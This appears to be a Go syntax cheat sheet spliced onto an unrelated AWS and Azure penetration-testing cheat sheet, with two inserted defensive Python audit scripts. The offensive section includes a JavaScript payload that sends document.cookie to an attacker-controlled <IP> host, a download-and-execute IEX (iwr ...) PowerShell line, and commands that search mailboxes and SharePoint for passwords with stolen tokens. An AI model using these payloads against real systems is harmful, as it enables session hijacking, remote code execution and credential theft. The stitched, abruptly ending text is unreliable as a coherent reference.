Hello World
A sample Go program is shown here.
package main

import "fmt"

func main() {
	message := greetMe("world")
	fmt.Println(message)
}

func greetMe(name string) string {
	return "Hello, " + name + "!"
}
Run the program as below:
$ go run hello.go
Variables
Normal Declaration:
var msg string
msg = "Hello"
Shortcut:
msg := "Hello"
Constants
const Phi = 1.618
Strings
str := "Hello"
Multiline string
str := `Multiline
string`
Numbers
Typical types
num := 3 // int
num := 3. // float64
num := 3 + 4i // complex128
num := byte('a') // byte (alias for uint8)
Other Types
var u uint = 7 // uint (unsigned)
var p float32 = 22.7 // 32-bit float
Arrays
// var numbers [5]int
numbers := [...]int{0, 0, 0, 0, 0}
Pointers
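func main() {
	b := *getPointer()
	fmt.Println("Value is", b)
}

func getPointer() (myPointer *int) {
	a := 234
	return &a // returning the address of a local is safe in Go
}

// new(T) allocates a zeroed T and returns a pointer to it
a := new(int)
*a = 234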
Pointers point to a memory location of a variable. Go is fully garbage-collected.
Type Conversion
i := 2
f := float64(i)
u := uint(i)
Slice
slice := []int{2, 3, 4}
slice := []byte("Hello")
Condition
if day == "sunday" || day == "saturday" {
	rest()
} else if day == "monday" && isTired() {
	groan()
} else {
	work()
}

if _, err := doThing(); err != nil {
	fmt.Println("Uh oh")
}
Switch
switch day {
case "sunday":
	// cases don't "fall through" by default!
	fallthrough
case "saturday":
	rest()
default:
	work()
}
Loop
for count := 0; count <= 10; count++ {
	fmt.Println("My counter is at", count)
}

entry := []string{"Jack", "John", "Jones"}
for i, val := range entry {
	fmt.Printf("At position %d, the character %s is present\n", i, val)
}

n := 0
x := 42
for n != x {
	n = guess() // assign to the outer n; "n :=" here would shadow it and the loop would never end
}
IAM
Enumerate valid users and roles in the AWS account
S3 Buckets
Check for Writable S3 Buckets
- If you can upload, then you can show impact by changing JS to steal cookies and other things.
var xhr=new XMLHttpRequest(); xhr.open("GET", "http://<IP>:8000/?"+document.cookie, true); xhr.send();
Check for Bucket Versioning
curl -I https://<BUCKETNAME>.s3.<REGION>.amazonaws.com # Look for x-amz-version-id
aws s3api list-object-versions --bucket <BUCKETNAME> --query "Versions[?VersionId!='null']" --no-sign-request
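From the bucket owner's side, the two checks above succeed when the bucket policy grants upload or version access to everyone. The following added example (not part of the original page) audits a bucket policy document for such grants; the sample policy, bucket name and Sids are constructed, and it inspects the policy only, not ACLs, NotPrincipal or NotAction.

```python
import json
from fnmatch import fnmatchcase

# Actions behind the checks above: anonymous upload, and anonymous
# listing or reading of older object versions.
RISKY_ACTIONS = ("s3:PutObject", "s3:ListBucketVersions", "s3:GetObjectVersion")

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _is_anonymous(principal):
    # Principal may be "*", {"AWS": "*"} or {"AWS": ["*", ...]}.
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any("*" in _as_list(v) for v in principal.values())
    return False

def anonymous_grants(policy_json):
    """Return {risky action: [statement ids]} granted unconditionally to everyone."""
    findings = {}
    policy = json.loads(policy_json)
    for idx, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow" or not _is_anonymous(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            continue  # conditional grant: review by hand, not auto-flagged
        sid = stmt.get("Sid", f"statement[{idx}]")
        for pattern in _as_list(stmt.get("Action", [])):
            for action in RISKY_ACTIONS:
                # Action patterns are case-insensitive and may contain * and ?.
                if fnmatchcase(action.lower(), pattern.lower()):
                    findings.setdefault(action, []).append(sid)
    return findings

# Constructed sample policy; "example-bucket" and "o-example" are placeholders.
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicAssets", "Effect": "Allow", "Principal": "*",
     "Action": ["s3:GetObject", "s3:Put*"], "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "VersionList", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "s3:ListBucketVersions", "Resource": "arn:aws:s3:::example-bucket"},
    {"Sid": "OrgOnly", "Effect": "Allow", "Principal": "*", "Action": "s3:*",
     "Resource": "arn:aws:s3:::example-bucket/*",
     "Condition": {"StringEquals": {"aws:PrincipalOrgID": "o-example"}}},
]})

if __name__ == "__main__":
    for action, sids in anonymous_grants(SAMPLE_POLICY).items():
        print(action, "is granted to everyone by", sids)
```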
Brute Force Bucket Names (assuming patterns are found)
ffuf -u 'https://bucket-FUZZ.s3.amazonaws.com' -w fuzzingBucketWordlist.txt
Odds and ends that sometimes help
Check for AWS Account Number
aws sts get-access-key-info --access-key-id <AKIA Key>
Recon and Enumeration
Get basic information about the domain
https://login.microsoftonline.com/getuserrealm.srf?login=example.com&xml=1
AAD Internals
Get-AADIntLoginInformation -Domain <example.com>
Get-AADIntTenantID -Domain <example.com>
Invoke-AADIntReconAsOutsider -DomainName <example.com>
https://aadinternals.com/osint/
Azure Subdomain Enumeration
Github https://github.com/yuyudhn/AzSubEnum
python3 azsubenum.py -b domain -p permutations.txt -v
Username Enumeration
Github: https://github.com/0xZDH/Omnispray
python3 omnispray.py -m o365_enum_office -d example.com -uf ~/Documents/userList.txt
Checking Azure MFA (Assuming Credentials are obtained)
Github: https://github.com/dafthack/MFASweep
Invoke-MFASweep -Username <Username> -Password <password> -Recon -IncludeADFS
Blob Enumeration
Format
https://<storageAccount>.blob.core.windows.net/<containername>/file.txt
# List Directories in Blob
https://<storageAccount>.blob.core.windows.net/<containername>?restype=container&comp=list&delimiter=%2F
# Check for Versioning in blob
curl -H "x-ms-version: 2019-12-12" 'https://<storageAccount>.blob.core.windows.net/<containername>?restype=container&comp=list&include=versions' | xmllint --format - | less
# Download Potential Files (assuming versioning is enabled)
curl -H "x-ms-version: 2019-12-12" 'https://<storageAccount>.blob.core.windows.net/<containername>/file.zip?versionId=<VersionID>' --output file.zip
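The version listing and versioned download above leave a recognisable trace in storage request logs. This added example (not part of the original page) flags successful anonymous requests of those two shapes; the field names are an assumption modelled on the Azure Monitor StorageBlobLogs columns, and every log record, account name and IP address is constructed.

```python
import json
from urllib.parse import urlsplit, parse_qs

def flag_anonymous_version_access(log_lines):
    """Return (caller, operation, container, reason) for anonymous version access."""
    findings = []
    for line in log_lines:
        rec = json.loads(line)
        if rec.get("AuthenticationType") != "Anonymous":
            continue
        if not str(rec.get("StatusCode", "")).startswith("2"):
            continue  # only requests that actually succeeded
        url = urlsplit(rec["Uri"])
        query = {k.lower(): v for k, v in parse_qs(url.query).items()}
        container = url.path.strip("/").split("/")[0]
        op = rec.get("OperationName")
        include = ",".join(query.get("include", [])).lower().split(",")
        if op == "ListBlobs" and "versions" in include:
            reason = "anonymous listing of blob versions"
        elif op == "GetBlob" and "versionid" in query:
            reason = "anonymous download of a specific blob version"
        else:
            continue
        findings.append((rec.get("CallerIpAddress"), op, container, reason))
    return findings

def _rec(auth, op, status, path_and_query):
    # Build one constructed log record as a JSON line (assumed field names).
    return json.dumps({
        "AuthenticationType": auth, "OperationName": op, "StatusCode": status,
        "CallerIpAddress": "203.0.113.7:50122",
        "Uri": "https://examplestorage.blob.core.windows.net:443" + path_and_query})

# Constructed sample: two records that should be flagged, three that should not.
SAMPLE_LOGS = [
    _rec("Anonymous", "ListBlobs", 200, "/backups?restype=container&comp=list&include=versions"),
    _rec("Anonymous", "GetBlob", 200, "/backups/file.zip?versionId=2024-01-01T00:00:00.0000000Z"),
    _rec("OAuth", "ListBlobs", 200, "/backups?restype=container&comp=list&include=versions"),
    _rec("Anonymous", "ListBlobs", 200, "/public?restype=container&comp=list&delimiter=%2F"),
    _rec("Anonymous", "GetBlob", 404, "/backups/file.zip?versionId=2024-01-01T00:00:00.0000000Z"),
]

if __name__ == "__main__":
    for finding in flag_anonymous_version_access(SAMPLE_LOGS):
        print(*finding, sep=" | ")
```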
Post Exploitation
GraphRunner to enumerate Office Products
IEX (iwr 'https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1')
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password filetype:xlsx'
Invoke-SearchTeams -Tokens $tokens -SearchTerm password
Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 50
Az and Graph PowerShell Modules
Setup Az and Graph PowerShell Modules
Install-Module Az
Import-Module Az
Connect-AzAccount
Install-Module Microsoft.Graph
Import-Module Microsoft.Graph
Connect-MgGraph
Microsoft Graph PowerShell Enumeration
#Get user Info
Get-MgUser -UserId <email> | fl
#Get AU Info
Get-MgDirectoryAdministrativeUnit | fl
#Get Roles associated with an AU
#Automation Script: https://github.com/BenTamam/PentestPlayground/blob/main/Azure/Scripts/CheckScopedRolePrivileges.ps1
$ScopedRoleMembers = Get-MgDirectoryAdministrativeUnitScopedRoleMember -AdministrativeUnitId <AU-ID>
Get-MgDirectoryRole -DirectoryRoleId <RoleID> | fl
#Find Users who are members of the Role
foreach ($member in $ScopedRoleMembers) {
    $userId = $member.RoleMemberInfo.Id
    if (-not $userId) {
        Write-Output "No user ID available for member with Role ID: $($member.RoleId)"
        continue
    }
    $userDetails = Get-MgUser -UserId $userId
    if ($userDetails) {
        Write-Output "User Details: Name - $($userDetails.DisplayName), Email - $($userDetails.Mail), Role ID - $($member.RoleId)"
    } else {
        Write-Output "Failed to retrieve details for user ID: $userId"
    }
}
#Checking Members of the AU
Get-MgDirectoryAdministrativeUnitMember -AdministrativeUnitId <AU-ID>
Windows AD Enumeration